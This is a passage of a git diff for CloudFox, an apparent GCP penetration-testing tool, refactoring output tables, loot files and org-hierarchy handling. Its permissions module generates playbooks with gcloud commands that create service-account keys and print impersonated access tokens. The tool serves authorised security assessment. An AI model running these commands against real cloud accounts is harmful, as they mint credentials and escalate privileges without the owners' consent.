Header: m.getFoxMapperHeader(), - Body: m.foxMapperFindingsToTableBody(), + Body: foxMapperBody, }) } - // Only add to output if we have tables or loot - if len(tableFiles) > 0 || len(lootFiles) > 0 { - outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} + // Add project-specific playbook (only one loot file per project) + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + lootFiles = append(lootFiles, *playbook) } + + // Always add all specified projects to output + outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} } pathBuilder := m.BuildPathBuilder() @@ -727,14 +957,7 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { tables := []internal.TableFile{} - if len(m.AllPaths) > 0 { - tables = append(tables, internal.TableFile{ - Name: "lateral-movement", - Header: m.getHeader(), - Body: m.pathsToTableBody(m.AllPaths), - }) - } - + // Only output the permissions table (not the old lateral-movement table) if len(m.FoxMapperFindings) > 0 { tables = append(tables, internal.TableFile{ Name: "lateral-movement-permissions", @@ -743,22 +966,16 @@ func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger inte }) } - // Collect loot files + // Add per-project playbooks var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil && playbook.Contents != "" { + playbook.Name = fmt.Sprintf("lateral-movement-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) } } - // Add playbook - playbook := m.generatePlaybook() - if playbook != nil && playbook.Contents != "" { - lootFiles = append(lootFiles, *playbook) - } - output := LateralMovementOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go old mode 100644 new mode 100755 index 5929700e..39190620 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -1,12 +1,13 @@ package commands import ( - "github.com/BishopFox/cloudfox/gcp/shared" "context" "fmt" "strings" "sync" + "github.com/BishopFox/cloudfox/gcp/shared" + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" "github.com/BishopFox/cloudfox/globals" @@ -167,7 +168,7 @@ func (m *LoadBalancersModule) addToLoot(projectID string, lb loadbalancerservice return } lootFile.Contents += fmt.Sprintf( - "## Load Balancer: %s (Project: %s)\n"+ + "#### Load Balancer: %s (Project: %s)\n"+ "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) @@ -241,9 +242,27 @@ func (m *LoadBalancersModule) generateLoadBalancerDiagram() string { return "" } + // Build a map of backend service name -> actual backends (instance groups, NEGs) + backendDetailsMap := make(map[string][]string) + for _, backends := range m.ProjectBackendServices { + for _, be := range backends { + if len(be.Backends) > 0 { + backendDetailsMap[be.Name] = be.Backends + } + } + } + // Convert to diagram service types diagramLBs := make([]diagramservice.LoadBalancerInfo, 0, len(allLBs)) for _, lb := range allLBs { + // Build backend details for this LB + lbBackendDetails := make(map[string][]string) + for _, beSvc := range lb.BackendServices { + if targets, ok := backendDetailsMap[beSvc]; ok { + lbBackendDetails[beSvc] = targets + } + } + diagramLBs = append(diagramLBs, diagramservice.LoadBalancerInfo{ Name: lb.Name, Type: lb.Type, @@ -253,6 +272,7 @@ func (m *LoadBalancersModule) generateLoadBalancerDiagram() string { Region: lb.Region, BackendServices: lb.BackendServices, SecurityPolicy: lb.SecurityPolicy, + BackendDetails: lbBackendDetails, }) } @@ -360,7 +380,7 @@ func (m *LoadBalancersModule) buildTablesForProject(projectID string) []internal if lbs, ok := m.ProjectLoadBalancers[projectID]; ok && len(lbs) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "load-balancers", + Name: "load-balancers-frontends", Header: m.getLBHeader(), Body: m.lbsToTableBody(lbs), }) @@ -376,7 +396,7 @@ func (m *LoadBalancersModule) buildTablesForProject(projectID string) []internal if services, ok := m.ProjectBackendServices[projectID]; ok && len(services) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "backend-services", + Name: "load-balancers-backend-services", Header: m.getBackendHeader(), Body: m.backendServicesToTableBody(services), }) @@ -435,7 +455,7 @@ func (m *LoadBalancersModule) writeFlatOutput(ctx context.Context, logger intern if len(allLBs) > 0 { tables = append(tables, internal.TableFile{ - Name: "load-balancers", + Name: "load-balancers-frontends", Header: m.getLBHeader(), Body: m.lbsToTableBody(allLBs), }) @@ -451,7 +471,7 @@ func (m *LoadBalancersModule) writeFlatOutput(ctx context.Context, logger intern if len(allBackends) > 0 { tables = append(tables, internal.TableFile{ - Name: "backend-services", + Name: "load-balancers-backend-services", Header: m.getBackendHeader(), Body: m.backendServicesToTableBody(allBackends), }) diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go old mode 100644 new mode 100755 index 58e5deb7..0837c5a0 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -94,6 +94,8 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ Name: org.Name, DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, }) } for _, folder := range orgCache.Folders { @@ -101,6 +103,7 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge Name: folder.Name, DisplayName: folder.DisplayName, Parent: folder.Parent, + State: folder.State, }) } for _, project := range orgCache.AllProjects { @@ -124,6 +127,8 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ Name: org.Name, DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, }) } for _, folder := range diskCache.Folders { @@ -131,6 +136,7 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge Name: folder.Name, DisplayName: folder.DisplayName, Parent: folder.Parent, + State: folder.State, }) } for _, project := range diskCache.AllProjects { @@ -200,16 +206,20 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge // Loot File Management // ------------------------------ func (m *OrganizationsModule) initializeLootFiles() { - m.LootMap["organizations-commands"] = &internal.LootFile{ - Name: "organizations-commands", + m.LootMap["org-commands"] = &internal.LootFile{ + Name: "org-commands", Contents: "# GCP Organization Commands\n# Generated by CloudFox\n\n", } - m.LootMap["organizations-map"] = &internal.LootFile{ - Name: "organizations-map", + m.LootMap["org-map"] = &internal.LootFile{ + Name: "org-map", Contents: "", } - m.LootMap["organizations-tree"] = &internal.LootFile{ - Name: "organizations-tree", + m.LootMap["org-tree"] = &internal.LootFile{ + Name: "org-tree", + Contents: "", + } + m.LootMap["org-scope-hierarchy"] = &internal.LootFile{ + Name: "org-scope-hierarchy", Contents: "", } } @@ -221,14 +231,17 @@ func (m *OrganizationsModule) generateLoot() { // Generate standard ASCII tree view m.generateTextTreeView() + // Generate linear hierarchy for scoped projects only + m.generateScopeHierarchy() + // Gcloud commands for organizations - m.LootMap["organizations-commands"].Contents += "# ==========================================\n" - m.LootMap["organizations-commands"].Contents += "# ORGANIZATION COMMANDS\n" - m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + m.LootMap["org-commands"].Contents += "# ==========================================\n" + m.LootMap["org-commands"].Contents += "# ORGANIZATION COMMANDS\n" + m.LootMap["org-commands"].Contents += "# ==========================================\n\n" for _, org := range m.Organizations { orgID := strings.TrimPrefix(org.Name, "organizations/") - m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + m.LootMap["org-commands"].Contents += fmt.Sprintf( "## Organization: %s (%s)\n"+ "gcloud organizations describe %s\n"+ "gcloud organizations get-iam-policy %s\n"+ @@ -244,13 +257,13 @@ func (m *OrganizationsModule) generateLoot() { // Gcloud commands for folders if len(m.Folders) > 0 { - m.LootMap["organizations-commands"].Contents += "# ==========================================\n" - m.LootMap["organizations-commands"].Contents += "# FOLDER COMMANDS\n" - m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + m.LootMap["org-commands"].Contents += "# ==========================================\n" + m.LootMap["org-commands"].Contents += "# FOLDER COMMANDS\n" + m.LootMap["org-commands"].Contents += "# ==========================================\n\n" for _, folder := range m.Folders { folderID := strings.TrimPrefix(folder.Name, "folders/") - m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + m.LootMap["org-commands"].Contents += fmt.Sprintf( "## Folder: %s (%s)\n"+ "gcloud resource-manager folders describe %s\n"+ "gcloud resource-manager folders get-iam-policy %s\n"+ @@ -268,7 +281,7 @@ func (m *OrganizationsModule) generateLoot() { // generateMarkdownTreeView creates a beautified expandable markdown tree of the organization hierarchy func (m *OrganizationsModule) generateMarkdownTreeView() { - tree := &m.LootMap["organizations-map"].Contents + tree := &m.LootMap["org-map"].Contents *tree += "# GCP Organization Hierarchy\n\n" @@ -362,7 +375,7 @@ func (m *OrganizationsModule) addFolderToMarkdownTree(tree *string, folder orgss // generateTextTreeView creates a standard ASCII tree of the organization hierarchy func (m *OrganizationsModule) generateTextTreeView() { - tree := &m.LootMap["organizations-tree"].Contents + tree := &m.LootMap["org-tree"].Contents for _, org := range m.Organizations { orgID := strings.TrimPrefix(org.Name, "organizations/") @@ -475,6 +488,102 @@ func (m *OrganizationsModule) addFolderToTextTree(tree *string, folder orgsservi } } +// generateScopeHierarchy creates a linear hierarchy view for only the projects in scope (-p or -l) +func (m *OrganizationsModule) generateScopeHierarchy() { + hierarchy := &m.LootMap["org-scope-hierarchy"].Contents + + *hierarchy = "# GCP Scope Hierarchy\n" + *hierarchy += "# Linear hierarchy paths for projects in scope\n" + *hierarchy += "# Generated by CloudFox\n\n" + + if len(m.ProjectIDs) == 0 { + *hierarchy += "No projects in scope.\n" + return + } + + // For each project in scope, show its full hierarchy path + for _, projectID := range m.ProjectIDs { + // Find the project info + var projectInfo *orgsservice.ProjectInfo + for i := range m.Projects { + if m.Projects[i].ProjectID == projectID { + projectInfo = &m.Projects[i] + break + } + } + + if projectInfo == nil { + *hierarchy += fmt.Sprintf("Project: %s (not found in hierarchy)\n\n", projectID) + continue + } + + // Build the hierarchy path from project up to org + path := m.buildHierarchyPath(projectInfo) + + // Output the linear path + projectName := projectInfo.DisplayName + if projectName == "" { + projectName = projectID + } + + *hierarchy += fmt.Sprintf("## %s (%s)\n", projectName, projectID) + + // Show path from org down to project + for i, node := range path { + indent := strings.Repeat(" ", i) + *hierarchy += fmt.Sprintf("%s%s\n", indent, node) + } + *hierarchy += "\n" + } +} + +// buildHierarchyPath builds the hierarchy path from org down to project +func (m *OrganizationsModule) buildHierarchyPath(project *orgsservice.ProjectInfo) []string { + var path []string + + // Start from the project and work up + var reversePath []string + + // Add project + projectName := project.DisplayName + if projectName == "" { + projectName = project.ProjectID + } + reversePath = append(reversePath, fmt.Sprintf("└── Project: %s (%s)", projectName, project.ProjectID)) + + // Traverse up the hierarchy + currentParent := project.Parent + for currentParent != "" { + if strings.HasPrefix(currentParent, "folders/") { + folderID := strings.TrimPrefix(currentParent, "folders/") + folderName := m.getFolderName(folderID) + reversePath = append(reversePath, fmt.Sprintf("└── Folder: %s (%s)", folderName, folderID)) + + // Find the folder's parent + for _, folder := range m.Folders { + if folder.Name == currentParent { + currentParent = folder.Parent + break + } + } + } else if strings.HasPrefix(currentParent, "organizations/") { + orgID := strings.TrimPrefix(currentParent, "organizations/") + orgName := m.getOrgName(orgID) + reversePath = append(reversePath, fmt.Sprintf("Organization: %s (%s)", orgName, orgID)) + break + } else { + break + } + } + + // Reverse to get org -> folder -> project order + for i := len(reversePath) - 1; i >= 0; i-- { + path = append(path, reversePath[i]) + } + + return path +} + // getChildFolders returns folders that are direct children of the given parent func (m *OrganizationsModule) getChildFolders(parentName string) []orgsservice.FolderInfo { var children []orgsservice.FolderInfo @@ -548,6 +657,8 @@ func (m *OrganizationsModule) saveToOrgCache(logger internal.Logger) { ID: orgID, Name: org.Name, DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, }) } for _, folder := range m.Folders { @@ -557,11 +668,18 @@ func (m *OrganizationsModule) saveToOrgCache(logger internal.Logger) { Name: folder.Name, DisplayName: folder.DisplayName, Parent: folder.Parent, + State: folder.State, }) } for _, project := range m.Projects { + // Extract project number from Name (format: "projects/123456789") + projectNumber := "" + if strings.HasPrefix(project.Name, "projects/") { + projectNumber = strings.TrimPrefix(project.Name, "projects/") + } cache.AddProject(gcpinternal.CachedProject{ ID: project.ProjectID, + Number: projectNumber, Name: project.Name, DisplayName: project.DisplayName, Parent: project.Parent, @@ -711,7 +829,7 @@ func (m *OrganizationsModule) buildTables() []internal.TableFile { if len(foldersBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "folders", + Name: "org-folders", Header: foldersHeader, Body: foldersBody, }) @@ -719,7 +837,7 @@ func (m *OrganizationsModule) buildTables() []internal.TableFile { if len(projectsBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "projects", + Name: "org-projects", Header: projectsHeader, Body: projectsBody, }) @@ -727,7 +845,7 @@ func (m *OrganizationsModule) buildTables() []internal.TableFile { if len(ancestryBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "ancestry", + Name: "org-ancestry", Header: ancestryHeader, Body: ancestryBody, }) diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go old mode 100644 new mode 100755 index fd70dfdb..44973ca2 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -96,13 +96,20 @@ type PermissionsModule struct { // Module-specific fields - now per-project for hierarchical output ProjectPerms map[string][]ExplodedPermission // projectID -> permissions OrgPerms map[string][]ExplodedPermission // orgID -> org-level permissions + FolderPerms map[string][]ExplodedPermission // folderID -> folder-level permissions EntityPermissions []IAMService.EntityPermissions // Legacy: aggregated for stats GroupInfos []IAMService.GroupInfo // Legacy: aggregated for stats OrgBindings []IAMService.PolicyBinding // org-level bindings FolderBindings map[string][]IAMService.PolicyBinding // folder-level bindings - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - EnumLoot *internal.LootFile // permissions-enumeration loot file - mu sync.Mutex + + // Per-scope loot files for inheritance-aware output + OrgLoot map[string]*internal.LootFile // orgID -> loot commands for org-level bindings + FolderLoot map[string]*internal.LootFile // folderID -> loot commands for folder-level bindings + ProjectLoot map[string]*internal.LootFile // projectID -> loot commands for project-level bindings + EnumLoot *internal.LootFile // permissions-enumeration loot file + + OrgCache *gcpinternal.OrgCache // OrgCache for hierarchy lookups + mu sync.Mutex // Organization info for output path OrgIDs []string @@ -133,11 +140,14 @@ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectPerms: make(map[string][]ExplodedPermission), OrgPerms: make(map[string][]ExplodedPermission), + FolderPerms: make(map[string][]ExplodedPermission), EntityPermissions: []IAMService.EntityPermissions{}, GroupInfos: []IAMService.GroupInfo{}, OrgBindings: []IAMService.PolicyBinding{}, FolderBindings: make(map[string][]IAMService.PolicyBinding), - LootMap: make(map[string]map[string]*internal.LootFile), + OrgLoot: make(map[string]*internal.LootFile), + FolderLoot: make(map[string]*internal.LootFile), + ProjectLoot: make(map[string]*internal.LootFile), OrgIDs: []string{}, OrgNames: make(map[string]string), EnumLoot: &internal.LootFile{Name: "permissions-enumeration", Contents: ""}, @@ -156,6 +166,9 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) logger.InfoM("Enumerating ALL permissions with full inheritance explosion...", globals.GCP_PERMISSIONS_MODULE_NAME) logger.InfoM("This includes organization, folder, and project-level bindings", globals.GCP_PERMISSIONS_MODULE_NAME) + // Get OrgCache for hierarchy lookups (used for inheritance-aware routing) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + // First, try to enumerate organization-level bindings m.enumerateOrganizationBindings(ctx, logger) @@ -222,6 +235,9 @@ func (m *PermissionsModule) getAllExplodedPerms() []ExplodedPermission { for _, perms := range m.OrgPerms { all = append(all, perms...) } + for _, perms := range m.FolderPerms { + all = append(all, perms...) + } for _, perms := range m.ProjectPerms { all = append(all, perms...) } @@ -318,6 +334,7 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string var projectPerms []ExplodedPermission var orgPerms []ExplodedPermission + var folderPerms []ExplodedPermission for _, ep := range entityPerms { for _, perm := range ep.Permissions { @@ -350,23 +367,20 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string // Detect cross-project access if ep.EntityType == "ServiceAccount" { - parts := strings.Split(ep.Email, "@") - if len(parts) == 2 { - saParts := strings.Split(parts[1], ".") - if len(saParts) >= 1 { - saProject := saParts[0] - if saProject != projectID { - exploded.IsCrossProject = true - exploded.SourceProject = saProject - } - } + saProject := extractProjectFromPrincipal(ep.Email, m.OrgCache) + if saProject != "" && saProject != projectID { + exploded.IsCrossProject = true + exploded.SourceProject = saProject } } - // Route to appropriate scope: org-level permissions go to org, rest to project - if perm.ResourceType == "organization" { + // Route to appropriate scope: org, folder, or project + switch perm.ResourceType { + case "organization": orgPerms = append(orgPerms, exploded) - } else { + case "folder": + folderPerms = append(folderPerms, exploded) + default: projectPerms = append(projectPerms, exploded) } } @@ -381,20 +395,27 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string m.OrgPerms[ep.ResourceScopeID] = append(m.OrgPerms[ep.ResourceScopeID], ep) } + // Store folder-level permissions (keyed by folder ID) + for _, ep := range folderPerms { + m.FolderPerms[ep.ResourceScopeID] = append(m.FolderPerms[ep.ResourceScopeID], ep) + } + // Legacy aggregated fields for stats m.EntityPermissions = append(m.EntityPermissions, entityPerms...) m.GroupInfos = append(m.GroupInfos, groupInfos...) - // Generate loot per-project - if m.LootMap[projectID] == nil { - m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["permissions-commands"] = &internal.LootFile{ - Name: "permissions-commands", - Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", + // Generate loot per-scope based on exploded permissions + // We use a set to track which service accounts we've already added per scope + addedSAsOrg := make(map[string]map[string]bool) // orgID -> email -> added + addedSAsFolder := make(map[string]map[string]bool) // folderID -> email -> added + addedSAsProject := make(map[string]map[string]bool) // projectID -> email -> added + + allPerms := append(append(projectPerms, orgPerms...), folderPerms...) + for _, ep := range allPerms { + if ep.EntityType != "ServiceAccount" { + continue } - } - for _, ep := range entityPerms { - m.addEntityToLoot(projectID, ep) + m.addPermissionToLoot(ep, addedSAsOrg, addedSAsFolder, addedSAsProject) } m.mu.Unlock() @@ -437,55 +458,111 @@ func parseConditionTitle(condition string) string { // ------------------------------ // Loot File Management // ------------------------------ -func (m *PermissionsModule) addEntityToLoot(projectID string, ep IAMService.EntityPermissions) { - // Only add service accounts with high-privilege permissions - hasHighPriv := false - var highPrivPerms []string - - for _, perm := range ep.Permissions { - if isHighPrivilegePermission(perm.Permission) { - hasHighPriv = true - highPrivPerms = append(highPrivPerms, perm.Permission) - } + +// addPermissionToLoot adds a service account to the appropriate scope-based loot file. +// It tracks which SAs have been added per scope to avoid duplicates. +func (m *PermissionsModule) addPermissionToLoot(ep ExplodedPermission, + addedSAsOrg map[string]map[string]bool, + addedSAsFolder map[string]map[string]bool, + addedSAsProject map[string]map[string]bool) { + + if ep.EntityType != "ServiceAccount" { + return } - if ep.EntityType == "ServiceAccount" { - lootFile := m.LootMap[projectID]["permissions-commands"] - if lootFile == nil { - return + scopeType := ep.ResourceScopeType + scopeID := ep.ResourceScopeID + email := ep.EntityEmail + + // Determine which loot file and tracking map to use + var lootFile *internal.LootFile + var addedSet map[string]bool + + switch scopeType { + case "organization": + if m.OrgLoot[scopeID] == nil { + m.OrgLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Organization Level)\n# Generated by CloudFox\n\n", + } + } + lootFile = m.OrgLoot[scopeID] + if addedSAsOrg[scopeID] == nil { + addedSAsOrg[scopeID] = make(map[string]bool) + } + addedSet = addedSAsOrg[scopeID] + + case "folder": + if m.FolderLoot[scopeID] == nil { + m.FolderLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Folder Level)\n# Generated by CloudFox\n\n", + } + } + lootFile = m.FolderLoot[scopeID] + if addedSAsFolder[scopeID] == nil { + addedSAsFolder[scopeID] = make(map[string]bool) } + addedSet = addedSAsFolder[scopeID] - if hasHighPriv { - lootFile.Contents += fmt.Sprintf( - "# Service Account: %s [HIGH PRIVILEGE]\n"+ - "# High-privilege permissions: %s\n"+ - "# Roles: %s\n", - ep.Email, - strings.Join(highPrivPerms, ", "), - strings.Join(ep.Roles, ", "), - ) - } else { - lootFile.Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Roles: %s\n", - ep.Email, - strings.Join(ep.Roles, ", "), - ) + default: // project + if m.ProjectLoot[scopeID] == nil { + m.ProjectLoot[scopeID] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (Project Level)\n# Generated by CloudFox\n\n", + } + } + lootFile = m.ProjectLoot[scopeID] + if addedSAsProject[scopeID] == nil { + addedSAsProject[scopeID] = make(map[string]bool) + } + addedSet = addedSAsProject[scopeID] + } + + // Skip if already added to this scope + if addedSet[email] { + return + } + addedSet[email] = true + + // Extract project from SA email for commands + saProject := ep.EffectiveProject + if saProject == "" { + // Try to extract from email + parts := strings.Split(email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } } + } - lootFile.Contents += fmt.Sprintf( - "gcloud iam service-accounts describe %s --project=%s\n"+ - "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ - "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ - "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n\n", - ep.Email, ep.ProjectID, - ep.Email, ep.ProjectID, - ep.Email, ep.ProjectID, - ep.Email, ep.ProjectID, - ep.Email, - ) + // Add service account commands + highPriv := "" + if ep.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" } + + lootFile.Contents += fmt.Sprintf( + "# Service Account: %s%s\n"+ + "# Role: %s (at %s/%s)\n", + email, highPriv, + ep.Role, scopeType, scopeID, + ) + + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + email, saProject, + email, saProject, + email, saProject, + email, saProject, + email, + ) } // isHighPrivilegePermission checks if a permission is considered high-privilege @@ -505,6 +582,134 @@ func (m *PermissionsModule) initializeEnumerationLoot() { m.EnumLoot.Contents += "# Use these commands to enumerate entities, roles, and permissions\n\n" } +// collectAllLootFiles collects all loot files for org-level output (all scopes combined) +func (m *PermissionsModule) collectAllLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + + // Combine all org, folder, and project loot into one file for org-level output + combinedLoot := &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands (All Scopes)\n# Generated by CloudFox\n\n", + } + + // Add org-level loot + for orgID, loot := range m.OrgLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Organization: %s ===\n", orgID) + // Skip the header line from the individual loot + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { // Skip first 2 header lines + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add folder-level loot + for folderID, loot := range m.FolderLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Folder: %s ===\n", folderID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add project-level loot + for projectID, loot := range m.ProjectLoot { + if loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Project: %s ===\n", projectID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Only add if there's actual content beyond the header + if len(combinedLoot.Contents) > 60 { // More than just the header + lootFiles = append(lootFiles, *combinedLoot) + } + + // Add enumeration loot file + if m.EnumLoot != nil && m.EnumLoot.Contents != "" { + lootFiles = append(lootFiles, *m.EnumLoot) + } + + return lootFiles +} + +// collectLootFilesForProject collects loot files for a specific project with inheritance. +// This includes: org-level loot + ancestor folder loot + project-level loot +func (m *PermissionsModule) collectLootFilesForProject(projectID string) []internal.LootFile { + var lootFiles []internal.LootFile + + combinedLoot := &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", + } + + // Get ancestry for this project + var projectOrgID string + var ancestorFolders []string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + } + + // Add org-level loot if this project belongs to an org + if projectOrgID != "" { + if loot, ok := m.OrgLoot[projectOrgID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Inherited from Organization: %s ===\n", projectOrgID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add folder-level loot for ancestor folders (in order from org to project) + // Reverse the slice to go from org-level folders to project-level folders + for i := len(ancestorFolders) - 1; i >= 0; i-- { + folderID := ancestorFolders[i] + if loot, ok := m.FolderLoot[folderID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Inherited from Folder: %s ===\n", folderID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + } + + // Add project-level loot + if loot, ok := m.ProjectLoot[projectID]; ok && loot != nil && loot.Contents != "" { + combinedLoot.Contents += fmt.Sprintf("# === Project: %s ===\n", projectID) + lines := strings.Split(loot.Contents, "\n") + for i, line := range lines { + if i >= 2 { + combinedLoot.Contents += line + "\n" + } + } + } + + // Only add if there's actual content beyond the header + if len(combinedLoot.Contents) > 50 { + lootFiles = append(lootFiles, *combinedLoot) + } + + return lootFiles +} + // generateEnumerationLoot generates commands to enumerate permissions func (m *PermissionsModule) generateEnumerationLoot() { loot := m.EnumLoot @@ -838,12 +1043,6 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { header := m.getTableHeader() - // Build hierarchical output data - outputData := internal.HierarchicalOutputData{ - OrgLevelData: make(map[string]internal.CloudfoxOutput), - ProjectLevelData: make(map[string]internal.CloudfoxOutput), - } - // Determine org ID - prefer discovered orgs, fall back to hierarchy orgID := "" if len(m.OrgIDs) > 0 { @@ -852,23 +1051,26 @@ func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger orgID = m.Hierarchy.Organizations[0].ID } - // Collect all loot files - var allLootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - allLootFiles = append(allLootFiles, *loot) - } - } + // Collect all loot files for org-level output + allLootFiles := m.collectAllLootFiles() + + // Get all permissions for output + allPerms := m.getAllExplodedPerms() + + // Check if we should use single-pass tee streaming for large datasets + if orgID != "" && len(allPerms) >= 50000 { + m.writeHierarchicalOutputTee(ctx, logger, orgID, header, allPerms, allLootFiles) + return } - // Add enumeration loot file - if m.EnumLoot != nil && m.EnumLoot.Contents != "" { - allLootFiles = append(allLootFiles, *m.EnumLoot) + + // Standard output path for smaller datasets + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } if orgID != "" { // DUAL OUTPUT: Complete aggregated output at org level - allPerms := m.getAllExplodedPerms() body := m.permsToTableBody(allPerms) tables := []internal.TableFile{{ Name: "permissions", @@ -877,7 +1079,7 @@ func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger }} outputData.OrgLevelData[orgID] = PermissionsOutput{Table: tables, Loot: allLootFiles} - // DUAL OUTPUT: Filtered per-project output + // DUAL OUTPUT: Filtered per-project output with inherited loot for projectID, perms := range m.ProjectPerms { if len(perms) == 0 { continue @@ -888,11 +1090,12 @@ func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger Header: header, Body: body, }} - outputData.ProjectLevelData[projectID] = PermissionsOutput{Table: tables, Loot: nil} + // Get loot for this project with inheritance (org + folders + project) + projectLoot := m.collectLootFilesForProject(projectID) + outputData.ProjectLevelData[projectID] = PermissionsOutput{Table: tables, Loot: projectLoot} } } else if len(m.ProjectIDs) > 0 { // FALLBACK: No org discovered, output complete data to first project - allPerms := m.getAllExplodedPerms() body := m.permsToTableBody(allPerms) tables := []internal.TableFile{{ Name: "permissions", @@ -920,6 +1123,94 @@ func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger } } +// writeHierarchicalOutputTee uses single-pass streaming for large datasets. +// It streams through all permissions once, writing each row to: +// 1. The org-level output (always) +// 2. The appropriate 